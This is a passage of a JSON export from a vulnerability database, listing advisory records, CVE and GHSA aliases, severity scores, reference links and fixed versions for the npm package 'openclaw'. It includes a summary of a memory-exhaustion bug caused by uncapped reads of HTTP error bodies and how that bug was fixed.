                    "url": "https://github.com/advisories/GHSA-5hff-46vh-rxmw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41298",
                "GHSA-5hff-46vh-rxmw"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7z2s-k6ty-ekg1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91092?format=api",
            "vulnerability_id": "VCID-816s-45wb-83ce",
            "summary": "OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n## Summary\nRemote media HTTP error bodies were read without a hard size cap before failure handling, allowing unbounded allocation on error responses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `81445a901091a5d27ef0b56fceedbe4724566438`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/media/fetch.ts now routes non-2xx failures through bounded prefix reads instead of buffering the whole error body.\n- src/media/read-response-with-limit.ts enforces capped reads and truncates oversized snippets before surfacing failure text.\n\nOpenClaw thanks @YLChen-007 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35633",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00157",
                            "scoring_system": "epss",
                            "scoring_elements": "0.36209",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00157",
                            "scoring_system": "epss",
                            "scoring_elements": "0.36246",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00157",
                            "scoring_system": "epss",
                            "scoring_elements": "0.36238",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35633"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4qwc-c7g9-4xcw",
                    "reference_id": "GHSA-4qwc-c7g9-4xcw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4qwc-c7g9-4xcw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
